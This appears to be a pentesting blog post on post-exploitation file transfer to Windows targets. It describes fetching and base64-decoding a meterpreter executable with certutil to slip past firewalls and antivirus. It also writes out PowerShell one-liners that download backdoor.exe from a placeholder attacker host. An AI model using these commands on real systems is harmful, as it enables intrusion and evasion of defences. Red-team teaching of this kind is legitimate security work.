So you’ve just popped a Windows box and need to move additional files to it...
Generally, in post exploitation, moving/transferring data within nix is relatively straight forward. Most of the time you’ll have at least curl, wget, nc, and/or scp to play with. In windows, not so much. But are you sure about that?
Here are two of my favourite methods for downloading files to my target box through a shell. My aim here is to use built-in tools and small one-liner commands that do not leave a footprint on the filesystem, and relatively stable from a non-interactive reverse shell.
Yes, these may leave some sort of temporary artefact, but I’m not including the creation of a vbs/ps1 script onto the target filesystem to download files… There’s definitely more ways of doing this, but below are ‘stealthier’ approaches by living off the land…
--> CERTUTIL
This is my favourite method.
Certutil is a built-in command line tool for various certificate based tasks with both client and server operations.
I believe it’s been built into Windows since XP/2K3… possibly 2K…
The exact parameter we can use to download files from a webserver is –urlcache and -split. The intended purpose of the urlcache parameter is to view and delete CRLs, and split allows you to save the output to a file.
We both of these, you can direct it to a webserver of your liking and download whatever you want!
As below, a successful download of a meterpreter exe:
The webserver will receive two GET requests:
However, the best part is being able to decode base64 encoded payloads without any additional tools. This is all possible with just using certutil.
Two of the main certificate formats used in Windows is DER and Base64.
Take the below certificate as an example. This is a Microsoft Root CA certificate exported in base64. If you view the raw contents of the file, you can see its base64 encoded:
You can decode it and output its content on the fly by simply using certutil:
Or, you can decode the contents into a new file with the –decode switch:
Passing these files to my kali machine, using the file command I can see it’s successfully converted the format:
So let’s take my meterpreter executable and base64 encode it:
Now from my reverse shell, I download the base64 encoded meterpreter exe as a text file:
Now I use certuil to decode the base64 content to bring the file back to its original PE format. Once decoded, I execute it:
Just to prove a point, the file remains intact and works:
What’s great, is that this has the potential of bypassing firewalls, WAFs and even less reputable AV engines. All possible using a built in legitimate Windows SIGNED command line tool
--> PowerShell
First, depending on what OS and PowerShell version you’re running, determines what you can use. Remember, the point of this blog entry is about using what’s there without installing or saving anything additional on disk. To check what PowerShell version is running on your target use $PSVersionTable.PSVersion as below:
If your major version is 3+ (Windows 8+/Server 2012+) you can use wget, which is an alias for Invoke-WebRequest. It works similar to the nix wget command:
wget http://evil.website.com/backdoor.exe -OutFile c:\temp\backdoor.exe
or
Invoke-WebRequest http://evil.website.com/backdoor.exe -OutFile c:\temp\backdoor.exe
Older than PowerShell 3.0? Never fear, the following is here:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\Users\YOURUSER\Desktop\b.exe')"
--> UPDATE!
Since the Windows 10 April 2018 update, OpenSSH is installed by default.
That means in addition to all of these two…. If you’re able to get a shell on an April 2018 build of Windows 10, you can use scp!
https://www.bleepingcomputer.com/news/microsoft/windows-10-openssh-client-installed-by-default-in-april-2018-update/
--> n33dle
No comments:
Post a Comment